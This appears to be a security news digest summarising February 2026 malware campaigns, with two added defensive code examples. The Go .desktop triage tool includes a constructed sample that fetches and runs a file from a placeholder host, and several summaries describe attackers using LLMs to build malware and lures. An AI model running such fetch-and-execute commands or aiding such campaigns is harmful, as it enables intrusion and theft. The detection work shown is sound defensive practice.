
News Summary

Last updated: 18:31 17/02/2026 UTC
  • Microsoft Releases November and December 2025 Patch Tuesday Updates for Windows 11
    Microsoft has fully resolved the Windows 11 'UNMOUNTABLE_BOOT_VOLUME' boot failure issue in the February 2026 Patch Tuesday security update (KB5077181), addressing a problem that left commercial systems unbootable after failed December 2025 updates. The issue, which affected Windows 11 versions 25H2 and 24H2, was initially mitigated by the optional KB5074105 preview update but is now considered fully resolved. Devices that became unbootable before the fix may still require manual recovery or enterprise support. Earlier, Microsoft linked the January 2026 boot failures to failed attempts to install the December 2025 security update, which left systems in an unstable state. The company had also released emergency out-of-band updates to fix an unrelated issue causing Microsoft Outlook to freeze when PST files were stored in cloud services. Prior updates included fixes for gaming performance issues, broken localhost HTTP connections, and Windows Recovery Environment (WinRE) problems, alongside cumulative updates for November and December 2025 introducing new features and addressing security vulnerabilities across Windows 11 versions 25H2/24H2 and 23H2.
  • Vulnerabilities in Cloud-Based Password Managers Enable Full Vault Compromise
    Researchers from ETH Zurich and USI discovered 27 vulnerabilities in Bitwarden, LastPass, Dashlane, and 1Password that could allow attackers to view and modify stored passwords. The flaws challenge the 'zero-knowledge encryption' claims of these services, with attacks ranging from integrity violations to complete vault compromise. The vulnerabilities were disclosed to the vendors, and remediation is underway. The researchers developed attack scenarios exploiting key escrow, vault encryption, sharing, and backwards compatibility features. Bitwarden was found to have a critical flaw in its organization onboarding process, allowing malicious auto-enrolment attacks. 1Password's use of a high-entropy cryptographic key provides it with a security advantage. Dashlane patched a downgrade attack vulnerability in November 2025. Bitwarden is addressing seven issues and accepting three as intentional design decisions. LastPass is working to enhance integrity guarantees.
  • Oyster Malware Distributed via Fake Microsoft Teams Installers
    A new malvertising campaign uses SEO poisoning to distribute fake Microsoft Teams installers that deploy the Oyster backdoor on Windows devices. The malware, known as OysterLoader, provides attackers with remote access to corporate networks, enabling command execution, payload deployment, and file transfers. The campaign targets users searching for 'Teams download,' leading them to a fake site that mimics Microsoft's official download page. The malicious installer, signed with legitimate certificates, drops a DLL into the %APPDATA%\Roaming folder and creates a scheduled task for persistence. Microsoft revoked over 200 certificates used to sign malicious Teams installers in a wave of Rhysida ransomware attacks in October 2025. The threat group Vanilla Tempest, also tracked as VICE SPIDER and Vice Society, is a financially motivated actor that focuses on deploying ransomware and exfiltrating data for extortion. The Oyster malware, also known as Broomstick and CleanUpLoader, has been linked to multiple campaigns and ransomware operations, such as Rhysida. The campaign was first disclosed by Blackpoint Cyber in September 2025, highlighting how users searching for Teams online were redirected to bogus download pages, where they were offered a malicious MSTeamsSetup.exe instead of the legitimate client. The threat actor used Trusted Signing, SSL.com, DigiCert, and GlobalSign code signing services to sign the malicious installers and other post-compromise tools. In early 2026, OysterLoader evolved with new C2 infrastructure and obfuscation methods, including a multi-stage infection chain and dynamic API resolution to hinder detection and analysis.
  • Notepad++ Update Mechanism Exploited to Deliver Malicious Payloads
    Notepad++ version 8.8.9 was released to address a security flaw in its WinGUp update tool that allowed attackers to push malicious executables instead of legitimate updates. Users reported incidents where the updater spawned a malicious AutoUpdater.exe that collected device information and exfiltrated it to a remote site. The flaw was mitigated by enforcing updates only from GitHub and later by requiring signature verification for all updates. Security researchers noted targeted attacks against organizations with interests in East Asia, where Notepad++ processes were used to gain initial access. The attack involved an infrastructure-level compromise at the hosting provider, allowing malicious actors to intercept and redirect update traffic. The incident commenced in June 2025 and continued until December 2025, with the Notepad++ website later migrated to a new hosting provider. The attackers were likely Chinese state-sponsored threat actors, selectively redirecting update requests from certain users to malicious servers. The hosting provider for the update feature was compromised, enabling targeted traffic redirections. The attackers regained access using previously obtained internal service credentials. Notepad++ has since migrated all clients to a new hosting provider with stronger security and plans to enforce mandatory certificate signature verification in version 8.9.2. The compromise involved shared hosting infrastructure rather than a flaw in the software's code, with attackers gaining access at the hosting provider level to intercept and manipulate traffic bound for the Notepad++ update endpoint. Direct server access by the attackers ended on September 2, 2025, but credentials associated with internal services remained exposed until December 2, 2025, allowing continued traffic redirection. The hosting provider confirmed no additional customers were affected.
    Notepad++ version 8.9.2 introduced a 'double-lock' design for its update mechanism, including verifying the signed installer from GitHub and checking the signed XML from the notepad-plus-plus.org domain. The auto-updater now removes libcurl.dll to eliminate DLL side-loading risk, removes unsecured cURL SSL options, and restricts plugin management execution to programs signed with the same certificate as WinGUp. Users can exclude the auto-updater during UI installation or deploy the MSI package with the NOUPDATER=1 flag. The threat group Lotus Blossom, linked to China, was involved in the compromise, using a custom backdoor called 'Chrysalis' as part of the attack chain.
  • Low-Skilled Cybercriminals Use AI for Vibe Extortion Attacks
    Low-skilled cybercriminals are leveraging AI to enhance their extortion campaigns, a technique dubbed 'vibe extortion' by researchers. This involves using large language models (LLMs) to script professional extortion strategies, including deadlines and pressure tactics. While the attackers themselves lack technical depth, AI provides coherence and professionalism to their threats. The use of AI in cybercrime has evolved beyond simple grammar improvements to include rapid vulnerability scanning, parallelized targeting, and automated ransomware tasks. Unit 42 researchers highlight that AI acts as a 'force multiplier' for attackers, significantly reducing operational friction and lowering the barrier to entry for cybercriminals.
  • Keenadu Android Backdoor Discovered in Firmware and Google Play Apps
    A sophisticated Android malware called Keenadu has been discovered embedded in firmware from multiple device brands and distributed through various vectors, including Google Play apps. The malware provides attackers with unrestricted control over infected devices, enabling broad-range data theft and other malicious activities. As of February 2026, 13,715 devices have been confirmed infected, primarily in Russia, Japan, Germany, Brazil, and the Netherlands. The malware's capabilities include compromising all installed applications, installing any apps from APK files, and monitoring user activities, including incognito browsing. Kaspersky researchers compare Keenadu to the Triada malware family, which was found in counterfeit Android devices last year. Keenadu has been detected in Alldocube iPlay 50 mini Pro firmware dating back to August 18, 2023, and is embedded within tablet firmware with valid digital signatures. The malware has also been found in smart home camera apps on Google Play with 300,000 downloads, which are no longer available.
  • Infostealer Malware Targets OpenClaw Configuration Files
    Infostealer malware has been observed stealing OpenClaw configuration files containing API keys, authentication tokens, and other sensitive secrets. This marks the first known instance of such attacks targeting the popular AI assistant framework. The stolen data includes configuration details, authentication tokens, and persistent memory files, which could enable full compromise of the victim's digital identity. The malware, identified as a variant of the Vidar infostealer, executed a broad file-stealing routine that scanned for sensitive keywords. Researchers predict increased targeting of OpenClaw as it becomes more integrated into professional workflows. Additionally, security issues with OpenClaw have prompted the maintainers to partner with VirusTotal to scan for malicious skills uploaded to ClawHub, establish a threat model, and add the ability to audit for potential misconfigurations.
Last updated: 20:46 17/02/2026 UTC
  • Lazarus Group Expands Operations with AI-Generated Video, Malware, and Malicious Packages in Cryptocurrency and Defense Sectors
    The Lazarus Group, a North Korea-linked threat actor, has expanded its operations to target European defense companies in 2025, leveraging a coordinated Operation DreamJob campaign. The attack involved fake recruitment lures and the deployment of various malware, including the ScoringMathTea RAT. This campaign follows earlier attacks on a decentralized finance (DeFi) organization in 2024, where the group deployed multiple cross-platform malware variants, including PondRAT, ThemeForestRAT, and RemotePE. In 2026, North Korean hackers have been observed using AI-generated video and the ClickFix technique to deliver malware for macOS and Windows to targets in the cryptocurrency sector. The threat actor's goal is financial, as suggested by the role of the tools used in an attack on a fintech company investigated by Google's Mandiant researchers. The attack had a strong social engineering component, with the victim being contacted over Telegram from a compromised executive account. The hackers used a Calendly link to a spoofed Zoom meeting page and showed a deepfake video of a CEO to facilitate the attack. Mandiant researchers found seven distinct macOS malware families attributed to UNC1069, a threat group they've been tracking since 2018. UNC1069 has been active since at least April 2018 and is also tracked under the monikers CryptoCore and MASAN. The group has used generative AI tools like Gemini to produce lure material and other messaging related to cryptocurrency. They have attempted to misuse Gemini to develop code to steal cryptocurrency and have leveraged deepfake images and video lures mimicking individuals in the cryptocurrency industry.
    The group has shifted from spear-phishing techniques and traditional finance (TradFi) targeting towards the Web3 industry since at least 2023, targeting centralized exchanges (CEX), software developers at financial institutions, high-technology companies, and individuals at venture capital funds. In the latest intrusion documented by Google's threat intelligence division, UNC1069 deployed as many as seven unique malware families, including several new malware families such as SILENCELIFT, DEEPBREATH, and CHROMEPUSH. The attack involved a social engineering scheme using a compromised Telegram account, a fake Zoom meeting, a ClickFix infection vector, and reported usage of AI-generated video to deceive the victim. The group used a fake website masquerading as Zoom to deceive victims and reused videos of previous victims to deceive new victims. The attack proceeded with a ClickFix-style troubleshooting command to deliver malware, leading to the deployment of various malicious components designed to gather system information, provide hands-on keyboard access, and steal sensitive data. Additionally, the Lazarus Group has been active since May 2025 with a campaign codenamed graphalgo, involving malicious packages in npm and PyPI repositories. Developers are targeted via social platforms like LinkedIn, Facebook, and Reddit. The campaign includes a fake company named Veltrix Capital in the blockchain and cryptocurrency trading space. Malicious packages are used to deploy a remote access trojan (RAT) that fetches and executes commands from an external server. The RAT supports commands to gather system information, enumerate files and directories, list running processes, create folders, rename files, delete files, and upload/download files. The command-and-control (C2) communication is protected by a token-based mechanism. The campaign checks for the MetaMask browser extension, indicating a focus on cryptocurrency theft.
    A malicious npm package called "duer-js" was found to harbor a Windows information stealer called Bada Stealer, capable of gathering Discord tokens, passwords, cookies, autofill data, cryptocurrency wallet details, and system information. Another malware campaign weaponizes npm to extort cryptocurrency payments from developers during package installation, blocking installation until victims pay 0.1 USDC/ETH to the attacker's wallet. The campaign has been ongoing since at least May 2025 and is characterized by modularity, allowing the threat actor to quickly resume it in case of partial compromise. The threat actor relies on packages published on the npm and PyPI registries that act as downloaders for a remote access trojan (RAT). Researchers found 192 malicious packages related to this campaign, which they dubbed 'Graphalgo'. The threat actor creates fake companies in the blockchain and crypto-trading sectors and publishes job offerings on various platforms, like LinkedIn, Facebook, and Reddit. Developers applying for the job are required to show their skills by running, debugging, and improving a given project, which causes a malicious dependency from a legitimate repository to be installed and executed. The package named 'bigmathutils,' with 10,000 downloads, was benign until it reached version 1.1.0, which introduced malicious payloads. The package was later removed and marked as deprecated. The Graphalgo name of the campaign is derived from packages that have 'graph' in their name, typically impersonating legitimate, popular libraries like graphlib. From December 2025 onward, the North Korean actor shifted to packages with 'big' in their name. The actor uses GitHub Organizations, which are shared accounts for collaboration across multiple projects. Malicious code is introduced indirectly via dependencies hosted on npm and PyPI.
    The RAT can list the running processes on the host, execute arbitrary commands per instructions from the command-and-control (C2) server, and exfiltrate files or drop additional payloads. The RAT checks whether the MetaMask cryptocurrency extension is installed on the victim's browser, indicating its money-stealing goals. The RAT's C2 communication is token-protected to lock out unauthorized observers, a common tactic for North Korean hackers. ReversingLabs has found multiple variants written in JavaScript, Python, and VBS, showing an intention to cover all possible targets. ReversingLabs attributes the Graphalgo fake recruiter campaign to the Lazarus group with medium-to-high confidence based on the approach, the use of coding tests as an infection vector, and the cryptocurrency-focused targeting, all of which align with previous activity associated with the North Korean threat actor. The delayed activation of malicious code in the packages is consistent with Lazarus' patience displayed in other attacks. The Git commits show the GMT+9 time zone, matching North Korea time.
  • Zscaler Acquires SquareX to Enhance Browser Security
    Zscaler has acquired SquareX, a browser security firm, to integrate its Browser Detection and Response (BDR) solution into its Zero Trust Exchange platform. The acquisition aims to extend security to unmanaged devices, allowing organizations to secure users within their preferred browsers like Google Chrome and Microsoft Edge without needing a full agent or a separate enterprise browser. The deal closed on February 5, 2026, and is part of Zscaler's strategy to enhance its security capabilities. SquareX's technology provides real-time threat detection and response directly within the browser, addressing threats like malicious extensions, phishing, and data leakage. Zscaler plans to complete the integration within the next few months, anticipating rapid demand despite SquareX's relatively small installed base.
  • ZeroDayRAT Malware Targets Android and iOS Devices
    A new commercial spyware platform, ZeroDayRAT, is being advertised on Telegram, offering full remote control over compromised Android (versions 5–16) and iOS (up to version 26) devices. The malware provides extensive surveillance capabilities, including real-time tracking, data theft, and financial fraud. It can log app usage, SMS messages, and notifications, activate cameras and microphones, and steal cryptocurrency and banking credentials. ZeroDayRAT is marketed through Telegram channels and infections are initiated by persuading victims to install malicious binaries via smishing, phishing emails, counterfeit app stores, and links shared through WhatsApp or Telegram. The malware includes a dedicated web-based dashboard displaying device details, app usage, SMS messages, and a live activity timeline. It also includes a crypto stealer and targets online banking apps, UPI platforms, and payment services like Apple Pay and PayPal. The malware is sold openly on Telegram with access to a panel featuring sales, customer support, and platform updates channels. It provides a complete overview of the phone's makeup, including device model, SIM, location data, carrier info, live activity timeline, and recent SMS messages, and offers features such as SMS control, a keylogger, a microphone feed, a screen recorder, a bank stealer, and a crypto stealer. ZeroDayRAT is priced at $2,000, indicating higher-than-average ambitions and targeting of specific individuals or enterprises. The malware represents a convergence of nation-state-level capabilities with criminal economics, widening the target market for surveillance malware.
  • VoidLink Malware Framework Targets Cloud and Container Environments
    VoidLink is a Linux-based command-and-control (C2) framework capable of long-term intrusion across cloud and enterprise environments. The malware generates implant binaries designed for credential theft, data exfiltration, and stealthy persistence on compromised systems. VoidLink combines multi-cloud targeting with container and kernel awareness in a single Linux implant, fingerprinting environments across major cloud providers and adjusting its behavior based on what it finds. The implant harvests credentials from environment variables, configuration files, and metadata APIs, and profiles security controls, kernel versions, and container runtimes before activating additional modules. VoidLink employs a modular plugin-based architecture that loads functionality as needed, including credential harvesting, environment fingerprinting, container escape, Kubernetes privilege escalation, and kernel-level stealth. The malware uses AES-256-GCM over HTTPS for encrypted C2 traffic, designed to resemble normal web activity. VoidLink stands out for its apparent development using a large language model (LLM) coding agent with limited human review, as indicated by unusual development artifacts such as structured "Phase X:" labels, verbose debug logs, and documentation left inside the production binary. The research concludes that VoidLink is not a proof-of-concept but an operational implant with live infrastructure, highlighting how AI-assisted development is lowering the barrier to producing functional, modular, and hard-to-detect malware. A previously unknown threat actor tracked as UAT-9921 has been observed leveraging VoidLink in campaigns targeting the technology and financial services sectors. UAT-9921 has been active since 2019, although they have not necessarily used VoidLink over the duration of their activity.
    The threat actor uses compromised hosts to install VoidLink command-and-control (C2) infrastructure, which is then used to launch scanning activities both internal and external to the network. VoidLink is deployed as a post-compromise tool, allowing the adversary to sidestep detection. The threat actor has been observed deploying a SOCKS proxy on compromised servers to launch scans for internal reconnaissance and lateral movement using open-source tools like Fscan. VoidLink uses three different programming languages: Zig for the implant, C for the plugins, and Go for the backend. The framework supports compilation on demand for plugins, providing support for the different Linux distributions that might be targeted. The plugins allow for gathering information, lateral movement, and anti-forensics. VoidLink comes fitted with a wide range of stealth mechanisms to hinder analysis, prevent its removal from the infected hosts, and even detect endpoint detection and response (EDR) solutions and devise an evasion strategy on the fly. VoidLink has an auditability feature and a role-based access control (RBAC) mechanism, which consists of three role levels: SuperAdmin, Operator, and Viewer. There are signs that there exists a main implant that has been compiled for Windows and can load plugins via a technique called DLL side-loading.
  • UNC5518 Access-as-a-Service Campaign via ClickFix and Fake CAPTCHA Pages
    Microsoft and Malwarebytes have disclosed a DNS-based ClickFix variant that marks the first documented use of the `nslookup` command to stage and deliver malicious payloads. This technique abuses DNS queries to retrieve a PowerShell script embedded in the `NAME:` field of a DNS response from an attacker-controlled server (84[.]21.189[.]20), which then deploys ModeloRAT via a Python runtime and VBScript persistence mechanism. The attack chain begins with fake CAPTCHA lures, followed by social engineering tactics (e.g., fake system alerts, browser crashes, or instructional videos) to coerce victims into executing the `nslookup` command, which downloads a ZIP archive containing the final payload. This evolution builds on earlier ClickFix tactics, including ConsentFix (Azure CLI OAuth abuse), CrashFix (malicious Chrome extensions triggering browser crashes), and SyncAppvPublishingServer.vbs (Google Calendar dead drops). The latest DNS-based approach demonstrates the campaign's adaptability, leveraging trusted native tools (`nslookup`), DNS as a C2 channel, and psychological manipulation (urgency tactics) to bypass security controls. Concurrently, ClickFix campaigns continue to expand with cross-platform targeting (Windows/Linux/macOS), AI platform abuse (ChatGPT, Grok, Claude), and weaponized SaaS infrastructure (Google Groups, Pastebin) to distribute payloads like Lumma Stealer and Odyssey Stealer. The integration of DNS staging, browser-native execution, and multi-stage loaders underscores the campaign's resilience despite 2025 law enforcement disruptions, with actors refining tradecraft to maximize evasion via social engineering, steganography, and legitimate service abuse.
  • Transparent Tribe Targets Indian Government with Dual-Platform Malware Campaign
    APT36, also known as Transparent Tribe, is targeting both Windows and BOSS Linux systems in ongoing attacks against Indian government and defense entities. The campaign, active since June 2025, involves phishing emails delivering malicious .desktop files disguised as PDFs. The malware facilitates data exfiltration, persistent espionage access, and includes anti-debugging and anti-sandbox checks. The malware also targets the Kavach 2FA solution used by Indian government agencies. The attack leverages the .desktop file's 'Exec=' field to execute a sequence of shell commands that download and run a Go-based ELF payload. The payload establishes persistence through cron jobs and systemd services, and communicates with a C2 server via a WebSocket channel. The technique allows APT36 to evade detection by abusing a legitimate Linux feature that is not typically monitored for threats. The campaign demonstrates APT36's evolving tactics, becoming more evasive and sophisticated. The campaign uses dedicated staging servers for malware distribution, transitioning from cloud storage platforms. The malware includes multiple persistence methods and supports commands for file browsing, collection, and remote execution. The campaign is part of a broader trend of targeted activity by South and East Asian threat actors, reflecting a shift toward purpose-built malware and infrastructure. Indian government entities have been targeted in two campaigns codenamed Gopher Strike and Sheet Attack. Gopher Strike leveraged phishing emails to deliver PDF documents with a blurred image and a fake Adobe Acrobat Reader DC update dialog. The campaign uses server-side checks to prevent automated URL analysis tools from fetching the ISO file, ensuring delivery only to intended targets in India.
    The malicious payload is a Golang-based downloader called GOGITTER, which creates a VBScript file to fetch commands from C2 servers. GOGITTER sets up persistence using a scheduled task to run the VBScript file every 50 minutes. GOGITTER downloads a ZIP file from a private GitHub repository and executes a lightweight Golang-based backdoor called GITSHELLPAD. GITSHELLPAD polls the C2 server every 15 seconds for commands and supports six different commands including cd, run, upload, and download. The results of command execution are stored in a file called "result.txt" and uploaded to the GitHub account. The threat actor also downloads RAR archives containing utilities to gather system information and drop GOSHELL, a bespoke Golang-based loader. GOSHELL's size was artificially inflated to approximately 1 gigabyte to evade detection by antivirus software. GOSHELL only executes on specific hostnames by comparing the victim's hostname against a hard-coded list. APT36 and SideCopy are launching cross-platform RAT campaigns against Indian entities using malware families like Geta RAT, Ares RAT, and DeskRAT. The campaigns use phishing emails with malicious attachments or download links to deliver the malware, which provides persistent remote access, system reconnaissance, data collection, and command execution. Geta RAT supports various commands including system information collection, process enumeration, credential gathering, and file operations. Ares RAT is a Python-based RAT that can run commands issued by the threat actor. DeskRAT is delivered via a rogue PowerPoint Add-In file with embedded macros. The campaigns target Indian defense, government, and strategic sectors, demonstrating a well-resourced, espionage-focused threat actor deliberately targeting these sectors through defense-themed lures, impersonated official documents, and regionally trusted infrastructure.
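The .desktop abuse described above works because desktop environments run whatever the `Exec=` key names when a user opens an entry whose `Name` and `Icon` say "PDF". A mail gateway or triage script can therefore treat a `.desktop` attachment as a small config file and read the fields before anyone clicks. The Go program below is an added example, not tooling from the researchers or from any vendor named above: it parses the `[Desktop Entry]` group of a freedesktop `.desktop` file and lists the heuristics that fire for document-masquerading entries whose `Exec` fetches remote content, spawns an inline shell, or chains commands. Both sample files are constructed for the example; the URL host is a reserved `.invalid` placeholder.

```go
package main

import (
	"bufio"
	"fmt"
	"regexp"
	"strings"
)

// DesktopEntry holds the key/value pairs of the [Desktop Entry] group.
type DesktopEntry map[string]string

// parseDesktop reads a freedesktop .desktop file; keys outside the
// [Desktop Entry] group (e.g. [Desktop Action ...]) are ignored.
func parseDesktop(content string) DesktopEntry {
	entry := DesktopEntry{}
	inMain := false
	sc := bufio.NewScanner(strings.NewReader(content))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}
		if strings.HasPrefix(line, "[") {
			inMain = line == "[Desktop Entry]"
			continue
		}
		if !inMain {
			continue
		}
		if k, v, ok := strings.Cut(line, "="); ok {
			entry[strings.TrimSpace(k)] = strings.TrimSpace(v)
		}
	}
	return entry
}

var (
	fetchRe = regexp.MustCompile(`\b(curl|wget)\b`)                              // remote fetch
	shellRe = regexp.MustCompile(`\b(ba|da|z)?sh\s+-c\b`)                        // inline shell
	chainRe = regexp.MustCompile(`chmod\s+\+x|base64\s+(-d|--decode)\b|;|&&|\|`) // staging / chaining
	docRe   = regexp.MustCompile(`(?i)\.(pdf|docx?|xlsx?|pptx?)$`)               // document masquerade
)

// triage lists why a .desktop file looks like a document-masquerading
// downloader. An empty result only means no heuristic fired.
func triage(filename string, e DesktopEntry) []string {
	var reasons []string
	exec := e["Exec"]
	masquerade := docRe.MatchString(e["Name"]) ||
		docRe.MatchString(strings.TrimSuffix(filename, ".desktop")) ||
		strings.Contains(strings.ToLower(e["Icon"]), "pdf")
	if masquerade {
		reasons = append(reasons, "name/icon present the entry as a document")
	}
	if fetchRe.MatchString(exec) {
		reasons = append(reasons, "Exec fetches remote content (curl/wget)")
	}
	if shellRe.MatchString(exec) {
		reasons = append(reasons, "Exec spawns an inline shell (sh -c)")
	}
	if chainRe.MatchString(exec) {
		reasons = append(reasons, "Exec chains commands or stages a file for execution")
	}
	if strings.EqualFold(e["Terminal"], "false") && (fetchRe.MatchString(exec) || shellRe.MatchString(exec)) {
		reasons = append(reasons, "shell-style Exec with the terminal hidden from the user")
	}
	return reasons
}

// Two constructed .desktop files (not real samples): a stock document-viewer
// entry and a lure shaped like the Exec= abuse described in the summary.
var samples = map[string]string{
	"evince.desktop": `[Desktop Entry]
Type=Application
Name=Document Viewer
Comment=View multi-page documents
Exec=evince %U
Icon=org.gnome.Evince
Terminal=false
MimeType=application/pdf;`,
	"Meeting_Minutes.pdf.desktop": `[Desktop Entry]
Type=Application
Name=Meeting_Minutes.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -fsSL http://staging.example.invalid/d -o /tmp/.cache-x; chmod +x /tmp/.cache-x; /tmp/.cache-x &"`,
}

// ScoreSamples triages every constructed sample and returns its reasons.
func ScoreSamples() map[string][]string {
	out := map[string][]string{}
	for name, body := range samples {
		out[name] = triage(name, parseDesktop(body))
	}
	return out
}

func main() {
	for name, reasons := range ScoreSamples() {
		fmt.Printf("%s: %d finding(s) %v\n", name, len(reasons), reasons)
	}
}
```

The masquerade check on its own is weak (some legitimate entries are named after documents), so a sensible policy is to quarantine only when it coincides with a fetch or inline-shell finding; the hidden-terminal rule exists because a lure needs the shell to run without a visible window.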
  • State-Backed Hackers Abuse AI Models for Advanced Cyber Attacks
    Google's Threat Intelligence Group (GTIG) has identified new malware families that leverage artificial intelligence (AI) and large language models (LLMs) for dynamic self-modification during execution. These malware families, including PromptFlux, PromptSteal, FruitShell, QuietVault, and PromptLock, demonstrate advanced capabilities for evading detection and maintaining persistence. PromptFlux, an experimental VBScript dropper, uses Google's Gemini LLM to generate obfuscated VBScript variants and evade antivirus software. It attempts persistence via Startup folder entries and spreads laterally on removable drives and mapped network shares. The malware is in a development or testing phase and is assessed to be financially motivated. PromptSteal is a data miner written in Python that queries the Qwen2.5-Coder-32B-Instruct LLM to generate one-line Windows commands to collect information and documents in specific folders and send the data to a command-and-control (C2) server. It is used by the Russian state-sponsored actor APT28 in attacks targeting Ukraine. State-backed hackers from China (APT31, Temp.HEX), Iran (APT42), North Korea (UNC2970), and Russia have used Gemini AI for all stages of an attack, including reconnaissance, phishing lure creation, C2 development, and data exfiltration. Chinese threat actors used Gemini to automate vulnerability analysis and provide targeted testing plans against specific US-based targets. Iranian adversary APT42 leveraged Gemini for social engineering campaigns and to speed up the creation of tailored malicious tools. The use of AI in malware enables adversaries to create more versatile and adaptive threats, posing significant challenges for cybersecurity defenses. Various threat actors, including those from China, Iran, and North Korea, have been observed abusing AI models like Gemini across different stages of the attack lifecycle.
    The underground market for AI-powered cybercrime tools is also growing, with offerings ranging from deepfake generation to malware development and vulnerability exploitation.

Latest updates


Notepad++ Update Mechanism Exploited to Deliver Malicious Payloads

Updated: 17.02.2026 20:29 · First: 11.12.2025 23:04 · 📰 5 src / 6 articles

Notepad++ version 8.8.9 was released to address a security flaw in its WinGUp update tool that allowed attackers to push malicious executables instead of legitimate updates. Users reported incidents where the updater spawned a malicious AutoUpdater.exe that collected device information and exfiltrated it to a remote site. The flaw was mitigated by enforcing updates only from GitHub and later by requiring signature verification for all updates. Security researchers noted targeted attacks against organizations with interests in East Asia, where Notepad++ processes were used to gain initial access. The attack involved an infrastructure-level compromise at the hosting provider, allowing malicious actors to intercept and redirect update traffic. The incident commenced in June 2025 and continued until December 2025, with the Notepad++ website later migrated to a new hosting provider. The attackers were likely Chinese state-sponsored threat actors, selectively redirecting update requests from certain users to malicious servers. The hosting provider for the update feature was compromised, enabling targeted traffic redirections. The attackers regained access using previously obtained internal service credentials. Notepad++ has since migrated all clients to a new hosting provider with stronger security and plans to enforce mandatory certificate signature verification in version 8.9.2. The compromise involved shared hosting infrastructure rather than a flaw in the software's code, with attackers gaining access at the hosting provider level to intercept and manipulate traffic bound for the Notepad++ update endpoint. Direct server access by the attackers ended on September 2, 2025, but credentials associated with internal services remained exposed until December 2, 2025, allowing continued traffic redirection. The hosting provider confirmed no additional customers were affected.
Notepad++ version 8.9.2 introduced a 'double-lock' design for its update mechanism, including verifying the signed installer from GitHub and checking the signed XML from the notepad-plus-plus.org domain. The auto-updater now removes libcurl.dll to eliminate DLL side-loading risk, removes unsecured cURL SSL options, and restricts plugin management execution to programs signed with the same certificate as WinGUp. Users can exclude the auto-updater during UI installation or deploy the MSI package with the NOUPDATER=1 flag. The threat group Lotus Blossom, linked to China, was involved in the compromise, using a custom backdoor called 'Chrysalis' as part of the attack chain.
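The value of the double-lock design is that each check fails independently: a redirected manifest, a swapped installer and a correctly signed manifest that points somewhere other than GitHub are all rejected for different reasons. The following is an added example of that acceptance logic, not Notepad++ or WinGUp code. It stands in HMAC-SHA256 under a pinned key for the certificate-signature check on the XML (the Python standard library has no public-key primitives) and a SHA-256 digest for the installer's Authenticode check; the manifest layout, host allow-list, installer filename and installer bytes are constructed for the example.

```python
"""Double-lock update acceptance, modelled on the policy described above.

Added example, not Notepad++ or WinGUp code. Three independent locks, any one
of which rejects the update:
  1. the manifest XML must authenticate under a key pinned in the client;
  2. the download location it names must be HTTPS on an allow-listed host;
  3. the downloaded installer must match the digest the manifest promised.
Stand-ins (assumptions): lock 1 uses HMAC-SHA256 with a pinned symmetric key in
place of the certificate signature the real updater checks; lock 3 uses a
SHA-256 digest in place of the installer's Authenticode signature. Manifest
layout, host list, filename and installer bytes are constructed.
"""
import hashlib
import hmac
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

ALLOWED_DOWNLOAD_HOSTS = {"github.com", "objects.githubusercontent.com"}
PINNED_MANIFEST_KEY = b"hypothetical-pinned-key"  # stands in for a pinned certificate


class UpdateRejected(Exception):
    pass


def manifest_tag(xml_bytes: bytes) -> str:
    """Publisher-side authentication tag over the exact manifest bytes."""
    return hmac.new(PINNED_MANIFEST_KEY, xml_bytes, hashlib.sha256).hexdigest()


def verify_update(manifest_xml: bytes, tag: str, installer: bytes) -> dict:
    """Return the accepted update's details, or raise UpdateRejected."""
    # Lock 1: authenticate before parsing, so attacker-controlled XML never reaches the parser.
    if not hmac.compare_digest(manifest_tag(manifest_xml), tag):
        raise UpdateRejected("manifest authentication failed")
    root = ET.fromstring(manifest_xml)
    url = root.findtext("Location") or ""
    expected = (root.findtext("Sha256") or "").lower()
    # Lock 2: only HTTPS downloads from the allow-listed hosts, whatever the manifest says.
    parsed = urlparse(url)
    if parsed.scheme != "https" or parsed.hostname not in ALLOWED_DOWNLOAD_HOSTS:
        raise UpdateRejected(f"download host not allowed: {parsed.hostname}")
    # Lock 3: the bytes actually fetched must be the bytes the manifest vouched for.
    actual = hashlib.sha256(installer).hexdigest()
    if not hmac.compare_digest(actual, expected):
        raise UpdateRejected("installer digest mismatch")
    return {"version": root.findtext("Version"), "url": url, "sha256": actual}


def build_manifest(version: str, url: str, installer: bytes):
    """Constructed publisher side: emit manifest XML plus its authentication tag."""
    xml = (f"<GUP><Version>{version}</Version><Location>{url}</Location>"
           f"<Sha256>{hashlib.sha256(installer).hexdigest()}</Sha256></GUP>").encode()
    return xml, manifest_tag(xml)


def outcome(manifest_xml: bytes, tag: str, installer: bytes) -> str:
    try:
        return "accepted " + verify_update(manifest_xml, tag, installer)["version"]
    except UpdateRejected as err:
        return f"rejected: {err}"


def demo() -> dict:
    good_installer = b"MZ constructed stand-in for the genuine installer"
    good_url = ("https://github.com/notepad-plus-plus/notepad-plus-plus/releases/"
                "download/v8.9.2/npp.8.9.2.Installer.x64.exe")  # constructed path
    xml, tag = build_manifest("8.9.2", good_url, good_installer)
    results = {"legit": outcome(xml, tag, good_installer)}
    # A: an on-path attacker rewrites the manifest to point at a rogue host (tag no longer matches).
    rogue = xml.replace(b"https://github.com", b"https://updates.example.net")
    results["rewritten_manifest"] = outcome(rogue, tag, good_installer)
    # B: manifest intact, but the server hands out a different binary.
    results["swapped_installer"] = outcome(xml, tag, b"MZ constructed stand-in for a malicious AutoUpdater")
    # C: a correctly tagged manifest that nonetheless points off GitHub (publishing-side compromise).
    xml2, tag2 = build_manifest("8.9.2", "https://updates.example.net/npp.exe", good_installer)
    results["off_github_host"] = outcome(xml2, tag2, good_installer)
    return results


if __name__ == "__main__":
    for scenario, result in demo().items():
        print(f"{scenario:20s} {result}")
```

Scenario A is the one the hosting-provider compromise produced: traffic to the update endpoint was rewritten, which here breaks lock 1 before the rogue URL is even looked at. Scenario C shows why the host allow-list is kept as a separate lock rather than folded into the signature check.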

AI Assistants Abused as Command-and-Control Proxies

Updated: · First: 17.02.2026 20:08 · 📰 1 src / 1 articles

